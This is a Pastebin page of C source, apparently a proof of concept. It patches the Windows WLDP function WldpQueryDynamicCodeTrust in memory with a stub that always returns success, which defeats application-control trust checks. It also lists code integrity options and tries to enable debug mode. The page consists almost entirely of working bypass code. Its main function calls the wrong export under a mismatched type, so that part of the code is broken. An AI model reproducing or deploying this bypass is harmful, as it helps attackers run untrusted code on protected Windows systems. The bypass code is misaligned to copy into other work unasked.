API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 19th, 2019
324
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.97 KB | None | 0 0
raw download clone embed print report
  1. /**
  2. BSD 3-Clause License
  3.  
  4. Copyright (c) 2019 Odzhan. All rights reserved.
  5.  
  6. Redistribution and use in source and binary forms, with or without
  7. modification, are permitted provided that the following conditions are met:
  8.  
  9. * Redistributions of source code must retain the above copyright notice, this
  10. list of conditions and the following disclaimer.
  11.  
  12. * Redistributions in binary form must reproduce the above copyright notice,
  13. this list of conditions and the following disclaimer in the documentation
  14. and/or other materials provided with the distribution.
  15.  
  16. * Neither the name of the copyright holder nor the names of its
  17. contributors may be used to endorse or promote products derived from
  18. this software without specific prior written permission.
  19.  
  20. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  21. AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  22. IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  23. DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  24. FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  25. DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  26. SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  27. CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  28. OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  29. OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  30. */
  31.  
  32. #include <windows.h>
  33. #include <wldp.h>
  34. #include <stdio.h>
  35.  
  36.  
  37. typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
  38. PBOOL isEnabled);
  39.  
  40. typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
  41. HANDLE fileHandle,
  42. PVOID baseImage,
  43. ULONG ImageSize);
  44.  
  45. // fake function that always returns S_OK
  46. static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
  47. HANDLE fileHandle,
  48. PVOID baseImage,
  49. ULONG ImageSize)
  50. {
  51. return S_OK;
  52. }
  53.  
  54. static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}
  55.  
  56. static BOOL PatchWldp(VOID) {
  57. BOOL patched = FALSE;
  58. HMODULE wldp;
  59. DWORD len, op, t;
  60. LPVOID cs;
  61.  
  62. // load wldp
  63. wldp = LoadLibrary("wldp");
  64.  
  65. if(wldp != NULL) {
  66. // resolve address of function to patch
  67. cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
  68.  
  69. if(cs != NULL) {
  70. // calculate length of stub
  71. len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
  72. (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
  73.  
  74. // make the memory writeable
  75. if(VirtualProtect(
  76. cs, len, PAGE_EXECUTE_READWRITE, &op))
  77. {
  78. // over write with stub
  79. memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
  80.  
  81. patched = TRUE;
  82.  
  83. // set back to original protection
  84. VirtualProtect(cs, len, op, &t);
  85. }
  86. }
  87. }
  88. return patched;
  89. }
  90.  
  91. BOOL VerifyCodeTrust(const char *path) {
  92. WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
  93. HMODULE wldp;
  94. HANDLE file, map, mem;
  95. HRESULT hr = -1;
  96. DWORD low, high;
  97.  
  98. // load wldp
  99. wldp = LoadLibrary("wldp");
  100. _WldpQueryDynamicCodeTrust =
  101. (WldpQueryDynamicCodeTrust_t)
  102. GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
  103.  
  104. // return FALSE on failure
  105. if(_WldpQueryDynamicCodeTrust == NULL) {
  106. printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
  107. return FALSE;
  108. }
  109.  
  110. // open file reading
  111. file = CreateFile(
  112. path, GENERIC_READ, FILE_SHARE_READ,
  113. NULL, OPEN_EXISTING,
  114. FILE_ATTRIBUTE_NORMAL, NULL);
  115.  
  116. if(file != INVALID_HANDLE_VALUE) {
  117. // get size
  118. low = GetFileSize(file, &high);
  119. if(low != 0) {
  120. // create mapping
  121. map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
  122. if(map != NULL) {
  123. // get pointer to memory
  124. mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
  125. if(mem != NULL) {
  126. // verify signature
  127. hr = _WldpQueryDynamicCodeTrust(0, mem, low);
  128. UnmapViewOfFile(mem);
  129. }
  130. CloseHandle(map);
  131. }
  132. }
  133. CloseHandle(file);
  134. }
  135. return hr == S_OK;
  136. }
  137.  
  138. #include "C:\ntlib\ntddk.h"
  139.  
  140. #define SystemCodeIntegrityInformation 0x67
  141.  
  142. #define CODEINTEGRITY_OPTION_ENABLED 0x0001
  143. #define CODEINTEGRITY_OPTION_TESTSIGN 0x0002
  144. #define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004
  145. #define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008
  146. #define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010
  147. #define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020
  148. #define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040
  149. #define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080
  150. #define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100
  151. #define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200
  152. #define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400
  153. #define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800
  154. #define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
  155. #define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
  156.  
  157. typedef struct _ci_opt {
  158. ULONG ulOption;
  159. PCHAR szOption;
  160. } ci_opt;
  161.  
  162. ci_opt options[]={
  163. {CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"},
  164. {CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"},
  165. {CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"},
  166. {CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
  167. {CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
  168. {CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"},
  169. {CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
  170. {CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
  171. {CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
  172. {CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
  173. {CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
  174. {CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
  175. {CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
  176. {CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
  177. {0, NULL}
  178. };
  179.  
  180. typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
  181. ULONG Length;
  182. ULONG CodeIntegrityOptions;
  183. } SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
  184.  
  185. VOID ListCIOptions(VOID) {
  186. NTSTATUS status;
  187. SYSTEM_CODEINTEGRITY_INFORMATION scii;
  188. DWORD i, len;
  189.  
  190. scii.Length = sizeof(scii);
  191.  
  192. status = NtQuerySystemInformation(
  193. SystemCodeIntegrityInformation,
  194. &scii, sizeof(scii), &len);
  195.  
  196. if(NT_SUCCESS(status)) {
  197. printf("\nCode Integrity Options.\n\n");
  198. for(i=0;options[i].ulOption != 0; i++) {
  199. if(scii.CodeIntegrityOptions & options[i].ulOption) {
  200. printf("%s\n", options[i].szOption);
  201. }
  202. }
  203. }
  204. }
  205.  
  206. // Trying to set the code integrity options will return STATUS_INVALID_INFO_CLASS
  207.  
  208. BOOL EnableCIOption(ULONG Option) {
  209. NTSTATUS status;
  210. SYSTEM_CODEINTEGRITY_INFORMATION scii;
  211. DWORD i, len;
  212.  
  213. scii.Length = sizeof(scii);
  214.  
  215. status = NtQuerySystemInformation(
  216. SystemCodeIntegrityInformation,
  217. &scii, sizeof(scii), &len);
  218.  
  219. if(NT_SUCCESS(status)) {
  220. scii.CodeIntegrityOptions |= CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED;
  221. status = NtSetSystemInformation(
  222. SystemCodeIntegrityInformation,
  223. &scii, sizeof(scii), &len);
  224.  
  225. printf("status is %08lx\n", status);
  226. }
  227. return NT_SUCCESS(status);
  228. }
  229.  
  230. int main(int argc, char *argv[]) {
  231. int i;
  232. WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled;
  233. BOOL enabled;
  234.  
  235. EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);
  236.  
  237. ListCIOptions();
  238.  
  239. WldpIsDynamicCodePolicyEnabled =
  240. (WldpIsDynamicCodePolicyEnabled_t)
  241. GetProcAddress(LoadLibrary("wldp"), "WldpQueryDynamicCodeTrust");
  242.  
  243. if(WldpIsDynamicCodePolicyEnabled == NULL) {
  244. printf("unable to load Wldp.\n");
  245. }
  246.  
  247. WldpIsDynamicCodePolicyEnabled(&enabled);
  248.  
  249. printf("Wldp Code Policy is %s.\n",
  250. enabled ? "enabled" : "disabled");
  251.  
  252. if(!PatchWldp()) {
  253. printf("unable to patch Wldp.\n");
  254. return 0;
  255. }
  256.  
  257. for(i=1; i<argc; i++) {
  258. // skip directories
  259. if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue;
  260. // verify file
  261. printf("%-8s : %s\n",
  262. VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
  263. argv[i]);
  264. }
  265. return 0;
  266. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!